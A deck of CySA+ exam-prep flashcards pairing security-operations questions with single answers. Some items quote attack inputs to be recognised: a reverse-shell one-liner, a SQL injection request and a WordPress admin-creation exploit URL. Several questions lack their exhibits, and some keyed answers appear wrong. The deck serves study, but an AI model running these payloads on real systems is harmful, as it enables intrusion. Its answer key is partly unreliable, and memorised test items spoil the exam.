CySA Prep Flashcards
A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process?
Validation
The analyst reviews the following endpoint log entry:
invoke-command -ComputerName clientcomputer1 -Credential
Which of the following has occurred?
New account introduced
A security program was able to achieve a 30% improvement in MTTR by integrating security controls in a SIEM. The analyst no longer had to jump between tools.
Which of the following best describes what the security program did?
Single pane of glass
Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output:
Which of the following choices should the analyst look at first?
p4wnp1_aloa.Ian (192.168.86.56)
When starting an investigation, which of the following must be done first?
Secure the scene
New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy.
Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy?
All new employees must sign a user agreement to acknowledge the company security policy.
An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft.
Which of the following would be the best threat intelligence source to learn about this new campaign?
Information sharing organization
An incident response team finished responding to a significant security incident. The management team asked the lead analyst to provide an after-action report that includes lessons learned.
Which of the following is the most likely reason to include lessons learned?
To identify areas of improvement in the incident response process
A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities. Additionally, the vulnerability team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority.
Which of the following vulnerabilities should be patched first, given the third-party scoring system?
TSpirit:
Cobain: Yes
Grohl: Yes
Novo: Yes
Smear: No
Channing: No
A user downloads software that contains malware onto a computer that eventually infects numerous other systems.
Which of the following has the user become?
Insider Threat
An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network.
Which of the following should the CSIRT conduct next?
Take a snapshot of the compromised server and verify its integrity.
During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?
Running processes
A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region.
Which of the following shell script functions could help achieve the goal?
function y() { dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short; }
A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?
function x() { info=$(geoiplookup $1) && echo "$1 | $info"; }
A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment.
Which of the following should be completed first to remediate the findings?
Perform proper sanitization on all fields
A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact to confidentiality and integrity but not to availability.
Which of the following CVE metrics would be the most accurate for this zero-day threat?
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
Which of the following tools would work best to prevent the exposure of PII outside of an organization?
DLP
An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:
Which of the following tuning recommendations should the security analyst share?
Block requests without an X-Frame-Options header
Which of the following items should be included in a vulnerability scan report? (Choose two.)
-Affected Hosts
-Risk Score
The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released.
Which of the following would best protect this organization?
A mean time to respond of 15 days.
A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following output:
Get-
Add-
Set-
Which of the following scripting languages was used in the script?
PowerShell
A company’s user accounts have been compromised. Users are also reporting that the company’s internal portal is sometimes only accessible through HTTP; other times it is accessible through HTTPS.
Which of the following most likely describes the observed activity?
An on-path attack is being performed by someone with internal access that forces users into port 80.
A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago, but the report did not have a follow-up remediation response from an analyst.
Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?
SLA
Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target?
Command and control
A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?
Agent-based
A security analyst detects an exploit attempt containing the following command:
sh -i >& /dev/udp/10.1.1.1/4821 0>$I
Which of the following is being attempted?
Reverse shell
An older CVE with vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation?
Weaponization
An analyst is reviewing a vulnerability report for a server environment with the following entries:
54.74.110.228
Crown jewel: Yes
Exploit available: Yes
Which of the following systems should be prioritized for patching first?
54.74.110.228
A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:
- Company uses CVSSv3.1 scoring metrics
- prioritize Confidentiality over availability
- public > internal systems
According to the security policy, which of the following vulnerabilities should be the highest priority to patch?
Name: CAP.SHIELD -
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
External System
Which of the following will most likely ensure that mission-critical services are available in the event of an incident?
Disaster recovery plan
The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk?
Deploy a CASB and enable policy enforcement
(cloud access security broker)
An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?
DNS
A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?
Exploitation
An analyst finds that an IP address outside of the company network is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing?
Reconnaissance
An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two)
-Social engineering attack
-Obfuscated links
During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied across the SDLC phases?
Use application security scanning as part of the pipeline for the CI/CD flow.
(continuous integration/continuous delivery)
An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot, resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?
Proprietary systems
A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results?
Agent-based scanning
A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately?
function x() { info=$(dig $(dig -x $1 | grep PTR | tail -n 1 | awk -F ".in-addr" '{print $1}').origin.asn.cymru.com TXT +short) && echo "$1 | $info"; }
There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario?
Improve employee training and awareness
Which of the following is the best way to begin preparation for a report titled “What We Learned” regarding a recent incident involving a cybersecurity breach?
Determine the sophistication of the audience that the report is meant for
A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?
Upload the binary to an air gapped sandbox for analysis
Which of the following would help to minimize human engagement and aid in process improvement in security operations?
SOAR
(security orchestration, automation, and response)
After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select?
Avoid
Which of the following is an important aspect that should be included in the lessons-learned step after an incident?
Identify any improvements or changes in the incident response plan or procedures
The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?
Single pane of glass
Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization?
MITRE ATT&CK
The security team reviews a web server for XSS and runs the following Nmap scan:
nmap -p80 --script http-unsafe-output-escaping 172.31.15.2
Characters [> " '] reflected in parameter id at http://172.31.15.2/1php?id=2
Which of the following most accurately describes the result of the scan?
The vulnerable parameter and characters > and " with a reflected XSS attempt
Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?
Schedule a review with all teams to discuss what occurred
A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?
Reverse engineering
An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server?
Malicious files
Which of the following security operations tasks are ideal for automation?
Email header analysis:
Check the email header for a phishing confidence metric greater than or equal to five
Add the domain of sender to the block list
Move the email to quarantine
An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?
Card issuer
Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system?
Mean time to detect
A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment?
Cloud-specific misconfigurations may not be detected by the current scanners.
A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temp files, reflecting the web searches from the user’s workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?
Ensure that the case details do not reflect any user-identifiable information; password-protect the evidence and restrict access to personnel related to the investigation
Which of the following is the first step that should be performed when establishing a disaster recovery plan?
Agree on the goals and objectives of the plan
Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?
The lead should review what is documented in the incident response policy or plan
A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?
Indicators of Compromise
An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed?
Beaconing
A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?
Change the display filter to ftp-data and follow the TCP streams.
An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?
Eradication
Joe, a leading salesperson at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer’s customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?
Perform no action until HR or legal counsel advises on next steps
The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks?
Reduce the administrator and privileged access accounts
During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first?
Clone the virtual server for forensic analysis
A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?
C2 beaconing activity
(Command and control)
A software developer is correcting the error-handling capabilities of an application following the initial coding of the fix.
Which of the following would the software developer MOST likely perform to validate the code prior to pushing it to production?
Static analysis
Forming a hypothesis, looking for indicators of compromise, and using the findings to proactively improve detection capabilities are examples of the value of:
threat hunting
Which of the following BEST explains the function of a managerial control?
To create data classification, risk assessments, security control reviews, and contingency planning.
Which of the following types of controls defines placing an ACL on a file folder?
Technical control
A code review reveals a web application is using time-based cookies for session management. This is a security concern because time-based cookies are easy to:
parameterize
A security analyst discovers suspicious host activity while performing monitoring activities. The analyst pulls a packet capture for the activity and sees the following:
Follow the TCP stream:
POST /210/gate.php HTTP/1.1
Host: utoftor.com
Which of the following best describes what has occurred?
The host downloaded an application from utoftor.com
A security analyst is reviewing the following Internet usage trend report:
User 1 Wk10-58GB Wk9-51GB Wk8-59GB Wk7-55GB
User 2 Wk10-185GB Wk9-97GB Wk8-87GB Wk7-92GB
User 3 Wk10-173GB Wk9-157GB Wk8-197GB Wk7-182GB
User 4 Wk10-38GB Wk9-46GB Wk8-29GB Wk7-41GB
Which of the following usernames should the security analyst investigate?
User 2
A consultant is evaluating multiple threat intelligence leads to assess potential risks for a client. Which of the following is the BEST approach for the consultant to consider when modeling the client’s attack surface?
Look at attacks against similar industry peers and assess the probability of the same attacks happening.
Which of the following BEST explains the function of TPM?
To provide hardware-based security features using unique keys
An analyst determines a security incident has occurred. Which of the following is the most appropriate NEXT step in an incident response plan?
Consult the communications plan
A company’s application development has been outsourced to a third-party development team. Based on the SLA, the development team must follow industry best practices for secure coding. Which of the following is the BEST way to verify this agreement?
Application fuzzing
A security administrator needs to provide access from partners to an isolated lab network inside an organization that meets the following requirements:
-partners' PCs must not connect directly to the lab network
-tools the partners need to access while on the lab network must be available to all partners
-partners must be able to run analyses on the lab network, which may take hours to complete.
Which of the following capabilities will MOST likely meet the security objectives of the request?
Deployment of a jump box to allow access to the laboratory network and use of VDI in persistent mode to provide the necessary tools for analyses.
Which of the following are the MOST likely reasons to include reporting processes when updating an incident response plan after a breach? (Select TWO)
- To establish a clear chain of command
- To meet regulatory requirements for timely reporting
Which of the following is MOST dangerous to the client environment during a vulnerability assessment penetration test?
The testing is outside the contractual scope
Which of the following is MOST important when developing a threat hunting program?
Understanding security software technologies
A cybersecurity analyst needs to harden a server that is currently being used as a web server. The server needs to be accessible when entering www.company.com into the browser. Additionally, web pages require frequent updates, which are performed by a remote contractor. Given the following output:
Starting Nmap 7.12 ( https://nmap.org ) at 2020-08-25 11:44
Nmap scan report for finance-server (72.56.70.94)
Host is up
Not shown: 995 closed ports
Which of the following should the cybersecurity analyst recommend to harden the server? (Choose two)
-Uninstall the DNS service
-Disable the Telnet service
Which of the following BEST describes HSM?
A computing device that manages digital keys, performs encryption/decryption functions, and maintains other cryptographic functions
(HSM=Hardware Security Module)
A threat hunting team received a new IoC from an ISAC that follows a threat actor’s profile and activities. Which of the following should be updated NEXT?
The IDS signature
Which of the following BEST describes what an organization's incident response plan should cover regarding how the organization handles public or private disclosures of an incident?
The disclosure section should contain the organization's legal and regulatory requirements regarding disclosures.
An IT security analyst has received an email alert regarding a vulnerability within the new fleet of vehicles the company recently purchased. Which of the following attack vectors is the vulnerability MOST likely targeting?
CAN bus
After examining a header and footer file, a security analyst begins reconstructing files by scanning the raw data bytes of a hard disk and rebuilding them. Which of the following techniques is the analyst using?
File carving
An organization is experiencing security incidents in which a systems admin is creating unauthorized user accounts… Below is one of the scripts:
cat /etc/passwd > daily_$(date +"%m_%d_%Y")
Which of the following commands would provide the analyst with additional useful information relevant to the above script?
diff daily_11_03_2019 daily_11_04_2019
A company’s domain has been spoofed in numerous phishing campaigns. An analyst needs to determine why the company is a victim of domain spoofing despite having a DMARC record that should tell mailbox providers to ignore any email that fails DMARC. Upon review of the record, the analyst finds the following:
p=none
Which of the following BEST explains the reason why the company’s requirements are not being processed correctly by mailbox providers?
The DMARC record’s policy tag is incorrectly configured.
Which of the following BEST explains the function of trusted firmware updates as they relate to hardware assurance?
Trusted firmware updates provide organizations with secure code signing, distribution, installation, and attestation for embedded devices.
A help desk technician inadvertently sent the credentials of the company’s CRM in clear text to an employee’s personal email account. The technician then reset the employee’s account using the appropriate process and the employee’s corporate email, and notified the security team of the incident. According to the incident response procedure, which of the following should the security team do NEXT?
Prepare an incident summary report
A developer downloaded and attempted to install a file transfer application in which the installation package is bundled with adware. The next-generation antivirus software prevented the file from executing, but it did not remove the file from the device. Over the next few days, more developers tried to download and execute the offending file. Which of the following changes should be made to the security tools to BEST remedy the issue?
Block the download of the file via the web proxy
After detecting possible malicious external scanning, an internal vulnerability scan was performed, and a critical server was found with an outdated version of JBoss. A legacy application that is running depends on that version of JBoss. Which of the following actions should be taken FIRST to prevent server compromise and business disruption at the same time?
Create a proper DMZ for outdated components and segregate the JBoss server.
An incident response team detected malicious software that could have gained access to credit card data. The incident response team was able to mitigate significant damage and implement corrective actions by having incident response mechanisms in place. Which of the following should be notified for lessons learned?
Company leadership
In SIEM software, a security analyst detected some changes to hash signatures from monitored files during the night, followed by SMB brute-force attacks against the file servers. Based on this behavior, which of the following actions should be taken FIRST to prevent a more serious compromise?
Fully segregate the affected servers physically in a network segment, apart from the production network.
While implementing a PKI for a company, a security analyst plans to utilize a dedicated server as the certificate authority that is only used to sign intermediate certificates. Which of the following are the MOST secure states for the certificate authority server when it is not in use? (Choose two)
-Full disk encrypted
-Air gapped
Which of the following BEST identifies the appropriate use of threat intelligence as a function of detection and response?
To identify likely attack scenarios within an organization
While conducting a cloud assessment, a security analyst performs a Prowler scan, which generates the following within the report:
FAIL! User BusinessUsr has never used access key 1 and not rotated it in 30 days
Based on the Prowler report, which of the following is the BEST recommendation?
Delete BusinessUsr access key 1.
An internally developed file-monitoring system identified the following excerpt as causing a program to crash often:
char filedata[100];
fp = fopen("access.log", "r");
strcpy(filedata, fp);
printf("%s\n", filedata);
Which of the following should a security analyst recommend to fix the issue?
Replace the strcpy function
An organization has the following policy statements:
-All emails entering or leaving the organization will be subject to inspection for malware, policy violations, and unauthorized content.
-All network activity will be logged and monitored.
-Confidential data will be tagged and tracked.
-Confidential data must never be transmitted in an unencrypted form.
-Confidential data must never be stored on an unencrypted mobile device.
Which of the following is the organization enforcing?
Data management policy
A CEO is concerned the company will be exposed to data sovereignty issues as a result of some new privacy regulations. To help mitigate this risk, the CISO wants to implement an appropriate technical control. Which of the following would meet the requirement?
Geographic access requirements
A security analyst needs to provide the development team with secure connectivity from the corporate network to a three-tier cloud environment. The developers require access to servers in all three tiers in order to perform various configuration tasks. Which of the following technologies should the analyst implement to provide secure transport?
VPN
A security analyst found an old version of OpenSSH running on a DMZ server and determined the following piece of code could have led to a command execution through an integer overflow:
nresp = packet_get_int();
if (nresp > 0) {
Which of the following controls must be in place to prevent this vulnerability?
Use built-in functions from libraries to check and handle long numbers properly.
A cyber-security analyst is implementing a new network configuration on an existing network access layer to prevent possible physical attacks. Which of the following BEST describes a solution that would apply and cause fewer issues during the deployment phase?
Implement port security with one MAC address per network port of the switch.
A security analyst at example.com receives a SIEM alert for an IDS signature and reviews the associated packet capture and TCP stream:
Which of the following actions should the security analyst take next?
Contact the application owner for connect.example.local for additional information
A security analyst needs to provide a copy of a hard drive for forensic analysis. Which of the following would allow the analyst to perform the task?
dd if=/dev/sda of=/mnt/usb/evidence.bin bs=4096; sha512sum /mnt/usb/evidence.bin > /mnt/usb/evidence.bin.hash
While monitoring the information security notification mailbox, a security analyst notices several emails were reported as spam. Which of the following should the analyst do FIRST?
Review the message in a secure environment
Company A is in the process of merging with company B. As part of the merger, connectivity between the ERP systems must be established so pertinent financial information can be shared between the two entities. Which of the following will establish a more automated approach to secure data transfers between the two entities?
Set up a VPN between Company A and Company B, granting access only to the ERPs within the connection.
A company has already planned the implementation of a vulnerability management procedure. However, the security maturity level is low, so there are some prerequisites to complete before risk calculation and prioritization. Which of the following should be completed first?
A risk identification process
A security team implemented a SIEM as part of its security monitoring program. There is a requirement to integrate a number of sources into the SIEM to provide better context relative to the events being processed. Which of the following BEST describes the result the security team hopes to accomplish by adding these sources?
Data enrichment
A security analyst is investigating an incident related to an alert from the threat detection platform on a host 10.0.1.25 in a staging environment that could be running a cryptomining tool because it is sending traffic to an IP address that is related to Bitcoin.
Which of the following is the BEST way to isolate and triage the host?
Remove rules 1, 2, and 5
An analyst is reviewing the following output as part of an incident:
Length=10
Length=15
Which of the following is MOST likely happening?
Information is leaking from the memory of host 10.20.30.40
The CISO of a large financial institution is seeking a solution that will block a predetermined set of data points from being transferred or downloaded by employees. The CISO also wants to track the data assets by name, type, content, or data profile.
Which of the following best describes what the CISO wants to purchase?
DLP
The majority of a company’s employees have stated they are unable to perform their job duties due to outdated workstations, so the company has decided to institute BYOD. Which of the following would a security analyst MOST likely recommend for securing the proposed solution?
802.1X to enforce company policy on BYOD user hardware.
The help desk is having difficulty keeping up with all the onboarding and offboarding requests. Managers often submit requests for new users at the last minute causing the help desk to scramble to create accounts across many different interconnected systems. Which of the following solutions would work BEST to assist the help desk with the onboarding and offboarding process while protecting the company’s assets?
SSO
A security analyst is concerned the number of security incidents being reported has suddenly gone down. Daily business interactions have not changed, and no additional security controls have been implemented. Which of the following should the analyst review FIRST?
The IDS rule set.
A developer is working on a program to convert user-generated input in a web form before it is displayed by the browser. This technique is referred to as:
output encoding
A vulnerability scanner has identified an out-of-support database software version running on a server. The software update will take six to nine months to complete. The management team has agreed to a one year extended support contract with the software vendor. Which of the following BEST describes the risk treatment in this scenario?
The company is accepting the inherent risk of the vulnerability.
Which of the following is an advantage of SOAR over SIEM?
SOAR reduces the amount of human intervention required
Which of the following factors would determine the regulations placed on data under data sovereignty laws?
The data laws of the country in which the company is located.
An organization’s internal department frequently uses a cloud provider to store large amounts of sensitive data. A threat actor has deployed a virtual machine to attack another virtual machine to gain access to the data. Through the use of the cloud host’s hypervisor, the threat actor has escalated the access rights. Which of the following actions would be BEST to remediate the vulnerability the attacker has used to exploit the system?
Update to the secure hypervisor version.
An online gaming company was impacted by a ransomware attack. An employee opened an attachment that was received via an SMS attack on a company-issued firewall. Which of the following actions would help during the forensic analysis of the mobile device? (Choose two)
- Documenting the respective chain of custody
- Performing a memory dump of the mobile device for analysis
A security analyst is reviewing a firewall usage report that contains traffic generated over the last 30 minutes in order to locate unusual traffic patterns:
Source IP Destination IP Application Bytes Sessions
192.168.48.147 192.168.31.1 Web browsing 5.3Gb 86
Which of the following IP addresses does the analyst need to investigate further?
192.168.48.147
During the threat modeling process for a new application that a company is launching, a security analyst needs to define methods and items to take into consideration.
Which of the following are part of a known threat modeling method?
Spoofing, tampering, repudiation, information disclosure, denial of service, elevation of privilege
A Chief Information Security Officer has asked for a list of hosts that have critical and high severity findings as referenced in the CVE database. Which of the following tools would produce the assessment output needed to satisfy this request?
Nessus
An organization wants to implement a privileged access management solution to better manage the use of emergency and privileged service accounts. Which of the following would BEST satisfy the organization’s goal?
Policy-based access controls
A security analyst is deploying a new application in the environment. The application needs to be integrated with several existing applications that contain SPI. Prior to the deployment, the analyst should conduct:
An application stress test
A manufacturing company uses a third-party service provider for Tier 1 security support. One of the requirements is that the provider must only source talent from its own country due to geopolitical and national security interests. Which of the following can the manufacturing company implement to ensure the third-party service provider meets this requirement?
Implement a secure supply chain program with governance.
Which of the following APT adversary archetypes represent the non-nation-state actors? (Select TWO)
- Jackal
- Spider
A security analyst was transferred to an organization’s threat hunting team to track specific activity throughout the enterprise environment. The analyst must observe and assess the number of times this activity occurs and aggregate the results. Which of the following is the BEST threat hunting method for the analyst to use?
Stack counting
A security officer needs to find the most cost effective solution to the current data privacy and protection gap found in the latest security assessment. Which of the following is the BEST recommendation?
Create a data minimization plan
An analyst is responding to an incident within a cloud infrastructure. Based on the logs and traffic analysis, the analyst thinks a container has been compromised. Which of the following should the analyst do FIRST?
Isolate the container from production using a predefined policy template.
A security analyst sees the following OWASP ZAP output from a scan that was performed against a modern version of Windows while testing for client-side vulnerabilities:
Web Browser XSS Protection not enabled
Which of the following is the MOST likely solution to the listed vulnerability?
Enable the browser’s XSS filter
During the security assessment of a new application, a tester attempts to log in to the application but receives the following message: "incorrect password for given username". Which of the following can the tester recommend to decrease the likelihood that a malicious attacker will receive helpful information?
Recognize that error messaging does not provide confirmation of the correct element of authentication.
An organization has the following risk mitigation policies:
-Risks without compensating controls will be mitigated first if the risk value is greater than $50,000.
-Other risk mitigation will be prioritized based on risk value.
Risk Probability Impact Compensating control?
A 80% 100,000 Y
B 20% 500,000 Y
C 50% 120,000 Y
D 40% 80,000 N
Which of the following is the order of priority for risk mitigation from highest to lowest?
C, B, A, D
During a review of SIEM alerts, a security analyst discovers the SIEM is receiving many alerts per day from the file-integrity monitoring tool about files from a newly deployed application that should not change. Which of the following steps should the analyst complete FIRST to respond to the issue?
Check if temporary files are being monitored
Which of the following is a difference between SOAR and SCAP?
SOAR has a wider breadth of capability using orchestration and automation, while SCAP is more limited in scope.
A security analyst is reviewing WAF alerts and sees the following request:
Request="GET /public/report.html?iewt=9064 AND 1=1 UNION ALL SELECT 1,NULL, table_name FROM information_schema.tables WHERE 2>1--/**/; HTTP/1.1 Host=mysite.com
Which of the following BEST describes the attack?
SQL injection
A security analyst is reviewing the output of tcpdump to analyze the type of activity on a packet capture:
port scan against 442-446 ports
Which of the following generated the above output?
a port scan
During routine monitoring, a security analyst identified the following enterprise network traffic:
Source Destination Protocol
192.168.12.21 209.132.177.50 TCP
Which of the following BEST describes what the security analyst observed?
192.168.12.21 made a TCP connection to 209.132.177.50
An analyst is responding to an incident involving an attack on a company-owned mobile device that was being used by an employee to collect data from clients in the field. Malware was loaded on the device via the installation of a third-party package. The analyst has baselined the device. Which of the following should the analyst do to BEST mitigate future attacks?
Implement MDM
(Mobile Device Management)
Some hard disks need to be taken as evidence for further analysis during an incident response. Which of the following procedures must be completed FIRST for this type of evidence acquisition?
Build the chain-of-custody document, noting the media model, serial number, size, vendor, date, and time of acquisition.
Which of the following is the software development process by which function, usability, and scenarios are tested against a known set of base requirements?
User acceptance testing
An organization wants to ensure the privacy of the data that is on its systems. Full disk encryption and DLP are already in use. Which of the following is the BEST option?
Enforce geofencing to limit data accessibility.
A company wants to configure the environment to allow passive network monitoring. To avoid disrupting the sensitive network, which of the following must be supported by the scanner’s NIC to assist with the company’s request?
port mirroring
Due to a rise in cyber attackers seeking PHI, a healthcare company that collects highly sensitive data from millions of customers is deploying a solution that will ensure the customer’s data is protected by the organization internally and externally. Which of the following countermeasures can BEST prevent the loss of the customer’s sensitive data?
Implement multifactor authentication
A company’s security team recently discovered a number of workstations that are at the end of life. The workstation vendor informs the team that the product is no longer supported and patches are no longer available. The company is not prepared to cease its use of these workstations. Which of the following would be the BEST method to protect these workstations from threats?
Isolate the workstations and air gap them when it is feasible.
During a review of recent network traffic, an analyst realizes the team has seen this same traffic multiple times in the past three weeks, and it resulted in confirmed malware activity. The analyst also noted there is no other alert in place for this traffic. After resolving the security incident, which of the following would be the BEST action for the analyst to take to increase the chance of detecting this traffic in the future?
Communicate the security incident to the threat team for further review and analysis
A company uses an FTP server to support its critical business functions. The FTP server is configured as follows:
-The FTP service is running with the data directory configured in /opt/ftp/data.
-The FTP server hosts employees’ home directories in /home.
-Employees may store sensitive information in their home directories.
An IoC revealed that an FTP directory traversal attack resulted in sensitive data loss. Which of the following should a server administrator implement to reduce the risk of current and future directory traversal attacks targeted at the FTP server?
Run the FTP server in a chroot environment
A company offers a hardware security appliance to customers that provides remote administration of a device on the customer’s network. Customers are not authorized to alter the configuration. The company deployed a software process to manage unauthorized changes to the appliance, log them, and forward them to a central repository for evaluation. Which of the following processes is the company using to ensure the appliance is not altered from its original configured state?
Change management
A security analyst is investigating a reported phishing attempt that was received by many users throughout the company. The text of one of the emails is shown below:
Due to the size of the company and the high storage requirements, the company does not log DNS requests or perform packet captures of network traffic, but it does log network flow data. Which of the following commands will the analyst most likely execute NEXT?
nslookup accountfix-office365.com
A company’s legal and accounting teams have decided it would be more cost-effective to offload the risks of data storage to a third party. The IT management team has decided to implement a cloud model and has asked the security team for recommendations. Which of the following will allow all data to be kept on the third-party network?
CASB
(cloud access security broker)
While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?
Determine what attack the odd characters are indicative of.
A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?
Incident response plan
A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?
Block the IP range of the scans at the network firewall.
An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:
/wp-json/trx_addons/V2/get/sc-layout?sc=wp_insert_user&role=administrator
Which of the following controls would work best to mitigate the attack represented by this snippet?
Limit user creation to administrators only
A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?
Performing input validation before allowing submission
A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?
Mean time to contain
An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has:
-created the initial evidence log
-disabled the wireless adapter on the device.
-interviewed the employee, who was unable to identify the website that was accessed.
-reviewed the web proxy traffic logs.
Which of the following should the analyst do to remediate the infected device?
Update the system firmware and reimage the hardware.
A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?
High GPU utilization
A company’s security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?
Legal department
Given the following CVSS string:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Which of the following attributes correctly describes this vulnerability?
The vulnerability is network based
A cryptocurrency service company is primarily concerned with ensuring the accuracy of the data on one of its systems. A security analyst has been tasked with prioritizing vulnerabilities for remediation of the system. The analyst will use the following CVSSv3.1 impact metrics for prioritization:
4 C:L/I:H/A:L
Which of the following vulnerabilities should be prioritized for remediation?
4
Patches for two highly exploited vulnerabilities were released on the same Friday afternoon. Information about the systems and vulnerabilities is shown in the table below:
System Name Vulnerability Network Segment
brady inter.drop external
Which of the following should the security analyst prioritize for remediation?
brady
A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on the device is not modified?
